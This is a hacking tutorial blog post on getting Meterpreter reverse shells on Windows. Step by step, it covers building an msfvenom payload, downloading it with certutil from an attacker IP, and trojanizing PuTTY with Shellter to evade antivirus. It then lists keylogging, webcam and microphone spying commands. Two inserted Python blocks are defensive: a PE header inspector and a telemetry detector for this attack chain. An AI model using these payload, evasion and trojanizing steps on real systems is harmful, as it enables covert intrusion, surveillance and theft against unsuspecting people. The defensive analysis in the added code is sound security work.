Meterpreter Shells on Windows Systems

In a previous guide, I walked you through how to get basic reverse shells on Linux and Windows systems. Link below.
At the end of that guide I teased the possibility of a guide on Meterpreter shells. The day has come (earlier than expected), and that guide is now a reality. I’m going to focus on Windows systems in this guide, since Meterpreter is used much more frequently on Windows than on Linux.
What is Meterpreter you ask? It’s basically an advanced interactive shell generated by Metasploit which enables advanced features/benefits like persistence, increased stealth, screen capturing, vulnerability scanning, multiple sessions, and much more. If you have the choice between a standard shell and Meterpreter, I’d go Meterpreter any day.
Next I must offer a warning. DO NOT execute this attack on hardware without EXPLICIT PERMISSION from the OWNER of said hardware. Executing this attack without proper authorization is equivalent to a CYBER CRIME, and carries with it penalties under law. I’m sharing this information for educational purposes, and accept no responsibility for damages caused by said information. You’ve been warned.
Let’s get into it. First off, you’ll need to boot up Kali Linux. Right away you’ll want to figure out the local IP address of your machine. You can do so with the following command:
ifconfig
Note that value down for later. Next, it’s time to launch Metasploit. You can do that with another single-line command:
msfconsole
That will launch the Metasploit Command Line Interface (CLI). Without explaining too much, Metasploit is an all-in-one hacking platform used to compromise all kinds of systems and programs. We’re going to use it to start our Meterpreter shell listener. Once this listener gets a connection, it will deploy the Meterpreter payload and hopefully start a Meterpreter shell.
We’ll set up our attack by defining what kind of attack we want and what kind of payload we want to deliver. These are the two values we want:
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
Note: you may want to check to make sure your victim Windows computer is 64-bit. You can do this on Windows 11 by opening the ‘Settings’ app and going to the following:

If your system is 32-bit, then you’ll want to substitute ‘x86’ for ‘x64’ in the payload command. If your system is less than 15 years old, then there is a very good chance it is 64-bit.
Moving on. We can view additional options for our Metasploit command by entering the following command:
options
There are two additional options we need to fill in there: ‘LHOST’ and ‘LPORT’. ‘L’ stands for ‘listen’. These options define which network interface and which port our Meterpreter listener will bind to. I’ll specify ‘eth0’ since it is the default network interface in virtual Kali Linux and ‘4242’ for the port since I really like The Hitchhiker’s Guide to the Galaxy.
set LHOST eth0
set LPORT 4242
So now if we run ‘options’ again, we should see these values filled in:

Yup. We’re ready to start our listener. So a lot of people will tell you to execute a ‘run’ command here, but let me introduce the much cooler sounding (and functionally identical) ‘exploit’ command:
exploit
Our listener is officially listening. This is equivalent to the Netcat command I shared in the last guide, just much nastier.
OK, now that we have a listener going we need to have our victim Windows machine send it a shell. This can’t be a shell from any old PowerShell script; it needs to be custom made for our listener. The easiest way to get this is with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.226.146 LPORT=4242 -f exe -o rshell.exe
Running this command will generate a Windows executable file (.exe) that, when run, will send a shell to our listener. Take note of the ‘LHOST’ and ‘LPORT’ values in that command. They should be the same as the ones we defined earlier in Metasploit.
With our ‘rshell.exe’ file in Kali, it’s time to transfer it to our victim Windows machine. I’ll start by hosting this file in a simple HTTP server via Python3:
python3 -m http.server 80
Then I’ll open a CMD prompt on the victim machine and download this file from the server:
certutil -urlcache -f http://192.168.226.146/rshell.exe rshell.exe
Once that is done… wait a minute.

I talked a lot of crap about Trend Micro in the last guide, but it managed to detect the threat inherent in this file and removed it. Well done. Later in this guide I’ll share a method that will bypass most antivirus software, but for now I’ll just disable Trend Micro and try again.
Once ‘rshell.exe’ is on the victim computer, it’s time to run it. That’s as easy as typing the file name into the CMD prompt:
rshell.exe
Once that is done it’s time to check our listener…


Meterpreter confirmed. We can get basic user info with the following command:
getuid
If we want to drop into a standard CMD prompt, we can simply type:
shell
You can then close this CMD prompt with:
exit
If you want to play around with this yourself, there’s just one more command you should know:
help
That will list out all the available commands and what they do. There is a whole list of Meterpreter commands to learn. I’ll link a good guide below.

Here are some of the more amusing ones in my opinion:
| Command | Description | Example Usage |
|---|---|---|
| play | plays a specified .wav audio file on the victim machine | play /home/kali/transfers/dj-airhorn.wav |
| keyscan_start | listens for and records keystrokes on the victim machine | keyscan_start |
| keyscan_dump | prints out keystrokes captured by the previous command | keyscan_dump |
| screenshare | shows a live video feed of the victim’s screens | screenshare |
| webcam_list | lists the webcams currently connected to the victim machine | webcam_list |
| webcam_stream | shows a live video feed from the specified webcam attached to the victim machine | webcam_stream -i 3 |
| record_mic | records audio from microphones attached to the victim machine and saves it to the attacker machine | record_mic -d 10 |
If you’ve been paying attention, then I hope you’re pretty creeped out by all this. It’s hilariously easy to spy on someone via Meterpreter. The amount of damage you can do with one shell is insane. Let’s make it a lot worse.
As promised, let’s look into how to bypass antivirus with our Meterpreter executable. If you’ll recall, my antivirus caught and deleted my ‘rshell.exe’ file pretty quickly.
We’ll do this with a program called Shellter. It will allow us to inject our Meterpreter reverse shell code into a legitimate Windows executable file. Setting up Shellter is a bit of an adventure, so please bear with me.
First, run the following commands:
sudo dpkg --add-architecture i386
sudo apt update && sudo apt install wine32
Next I recommend you reboot your Kali Linux instance. Once it’s rebooted, run the following two commands to install and configure Winetricks and Shellter respectively:
winetricks
shellter
Once they are both installed, you should be good to go. Let’s run Shellter:
shellter
It’s asking what mode we want. I’ll say ‘A’ for ‘Automatic’.

Now it’s asking for ‘PE Target’. ‘PE’ means ‘Portable Executable’. This means it’s asking us for the location of a legitimate Windows executable file. Unfortunately, Shellter currently only supports 32-bit executables. A good target for this is the 32-bit PuTTY executable. I’ll link below.
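Both the payload choice earlier (x86 vs. x64) and Shellter’s 32-bit-only restriction come down to one field in the PE header. The following is an added example, not part of the original post and not Shellter or Metasploit code: it parses just enough of a PE image to report whether it is 32- or 64-bit and whether it carries an Authenticode certificate table, which is the kind of check a defender runs on a binary that arrived from somewhere other than the vendor (the closing advice of this post). The sample headers it inspects are constructed in `build_sample_pe`; they are not real executables, and `sha256_matches` compares against whatever hash the vendor publishes, which you supply yourself.

```python
import hashlib
import hmac
import struct

# COFF machine types and optional-header magics from the PE/COFF specification
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC = 0x10B       # 32-bit optional header
PE32PLUS_MAGIC = 0x20B   # 64-bit optional header
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # data-directory slot of the Authenticode certificate table


def inspect_pe(data):
    """Parse just enough of a PE image to report its bitness and whether it carries
    an Authenticode certificate table. Raises ValueError on anything that is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 2 or len(data) < opt + opt_size:
        raise ValueError("truncated optional header")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == PE32_MAGIC:
        bits, count_off, dir_base = 32, 92, 96    # NumberOfRvaAndSizes / first data directory
    elif magic == PE32PLUS_MAGIC:
        bits, count_off, dir_base = 64, 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    has_cert_table = False
    if opt_size >= dir_base + 8 * (IMAGE_DIRECTORY_ENTRY_SECURITY + 1):
        (n_dirs,) = struct.unpack_from("<I", data, opt + count_off)
        if n_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
            _rva, size = struct.unpack_from("<II", data, opt + dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
            has_cert_table = size > 0   # a certificate table is present; validity is a separate check
    expected = IMAGE_FILE_MACHINE_I386 if bits == 32 else IMAGE_FILE_MACHINE_AMD64
    return {
        "bits": bits,
        "machine": machine,
        "machine_matches_magic": machine == expected,
        "has_certificate_table": has_cert_table,
    }


def sha256_matches(data, published_hex):
    """Compare a file's SHA-256 with the hash the vendor publishes (constant-time compare)."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), published_hex.lower())


def build_sample_pe(machine, magic, cert_size=0):
    """Constructed minimal PE header (no sections, no code) for demonstration only."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew -> PE signature right after DOS header
    dir_base = 96 if magic == PE32_MAGIC else 112
    opt = bytearray(dir_base + 16 * 8)                        # 16 data directories
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, dir_base - 4, 16)             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     0x1000 if cert_size else 0, cert_size)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(inspect_pe(f.read()))
    else:
        print(inspect_pe(build_sample_pe(IMAGE_FILE_MACHINE_I386, PE32_MAGIC)))
        print(inspect_pe(build_sample_pe(IMAGE_FILE_MACHINE_AMD64, PE32PLUS_MAGIC, cert_size=0x1800)))
```

A `has_certificate_table` of `True` only says a signature blob is attached; a binary that has been modified after signing still carries the (now invalid) table. To actually validate it, use `Get-AuthenticodeSignature` in PowerShell or `signtool verify /pa`, and compare the SHA-256 with the hash published on the vendor’s download page.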

Once ‘putty.exe’ is downloaded on Kali, state the absolute path where it resides.

It will take some time to analyze the executable, so give it a minute. Next you should see the following option:

I’ll specify ‘Y’ for yes. Stealth mode means the Putty program will execute normally along with our Meterpreter shell code, making it even harder to detect.
Next option:

Choice #1 should look familiar. That’s exactly what we want. I’ll specify ‘L’ for a listed payload and then ‘1’ for the ‘Meterpreter_Reverse_TCP’ payload.

Alright, very familiar. I’ll input my attacker IP and port 4242 for the next two options.

Let that run out and…

Done! Our ‘putty.exe’ file should now be totally malicious. Let’s try it out.
Next I’ll close out my current Meterpreter shell. Before I re-run the exploit, I need to update the ‘payload’ value to not include ‘x64’:
set payload windows/meterpreter/reverse_tcp
Now I’ll re-run ‘exploit’, which will start my listener again.

Next I’ll restart Trend Micro on my victim machine.

Now I’ll host my ‘putty.exe’ file in my HTTP server directory and download it onto the victim machine just like before:
certutil -urlcache -f http://192.168.226.146/putty.exe putty.exe
This time Trend Micro did not automatically delete the file. Let’s try to run it:
putty.exe
Touché, Trend Micro. If you look closely at the warning though, it’s more concerned with the file’s source than with the actual content of the file. This will likely happen for any file downloaded from a local source or shared via USB drive. Exactly the kind of warning people are good at ignoring. What happens when we click ‘Open file’?

PuTTY launched as expected. Let’s check our Metasploit listener:

A shell! Since PuTTY is working exactly as expected, our presence would likely go unnoticed. Moral of the story folks: don’t trust files that don’t come from the source itself.
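The antivirus missed the file, but the behaviour chain in both halves of this walkthrough (certutil fetching an executable over HTTP, that executable running from a user profile directory, an outbound connection to an unusual port, and cmd.exe appearing as its child when `shell` is typed) is very visible in endpoint telemetry. The following is an added example, not part of the original post: a small correlation routine run over constructed Sysmon-style process-create and network-connect events that mirror the steps above. The event records, field names, paths and PIDs are made up for the demonstration; the IP and port come from the walkthrough.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (Event ID 1 = process create, 3 = network connect)
# modelled on the walkthrough; they are illustrative, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -f http://192.168.226.146/rshell.exe rshell.exe",
     "cwd": r"C:\Users\alice"},
    {"id": 1, "pid": 4188, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\alice\rshell.exe", "cmdline": "rshell.exe", "cwd": r"C:\Users\alice"},
    {"id": 3, "pid": 4188, "image": r"C:\Users\alice\rshell.exe",
     "dst_ip": "192.168.226.146", "dst_port": 4242},
    {"id": 1, "pid": 4300, "parent_image": r"C:\Users\alice\rshell.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe", "cwd": r"C:\Users\alice"},
    # benign noise: certutil doing certificate work, a browser talking HTTPS
    {"id": 1, "pid": 5001, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify corp-root.cer", "cwd": r"C:\Users\alice"},
    {"id": 3, "pid": 912, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
]

# certutil invoked with -urlcache and a URL: the living-off-the-land download pattern
CERTUTIL_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\s.*-urlcache\b.*?\bhttps?://(\S+)", re.IGNORECASE)
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
EXPECTED_EGRESS_PORTS = {80, 443}
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe"}


def in_user_writable(path):
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def basename(path):
    return PureWindowsPath(path).name.lower()


def analyze(events):
    """Return (severity, pid, message) findings; severity rises when the stages chain together."""
    findings = []
    fetched = {}  # lower-cased path of a certutil-downloaded file -> source URL
    for ev in events:
        if ev["id"] == 1:
            image = ev["image"].lower()
            m = CERTUTIL_DOWNLOAD.search(ev["cmdline"])
            if m:
                url = m.group(1)
                out = ev["cmdline"].split()[-1]
                # certutil writes to the last argument; remember where the file landed
                if not out.lower().startswith("http"):
                    fetched[str(PureWindowsPath(ev["cwd"]) / out).lower()] = url
                findings.append(("medium", ev["pid"], "certutil used as a downloader: " + url))
            elif image in fetched:
                findings.append(("high", ev["pid"], "execution of file fetched by certutil from " + fetched[image]))
            parent = ev.get("parent_image", "")
            if parent and in_user_writable(parent) and basename(ev["image"]) in INTERACTIVE_SHELLS:
                findings.append(("high", ev["pid"], "interactive shell spawned by " + parent))
        elif ev["id"] == 3:
            if in_user_writable(ev["image"]) and ev["dst_port"] not in EXPECTED_EGRESS_PORTS:
                sev = "high" if ev["image"].lower() in fetched else "medium"
                findings.append((sev, ev["pid"], "outbound %s:%d from user-writable path %s"
                                 % (ev["dst_ip"], ev["dst_port"], ev["image"])))
    return findings


if __name__ == "__main__":
    for severity, pid, message in analyze(SAMPLE_EVENTS):
        print("[%s] pid %d: %s" % (severity.upper(), pid, message))
```

Run against the sample events this yields four findings (the certutil download, the downloaded file executing, its connection to port 4242, and cmd.exe spawned under it) and nothing for the benign certutil and browser events. The same logic maps directly onto a SIEM query: the three pieces of state worth correlating are the download command line, the image path of the new process, and the parent image of any shell.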
Anyway, that was an interesting ride. Meterpreter is a tool that will serve you well along your hacking journey. I only ask that you use this power for good. Have a good day.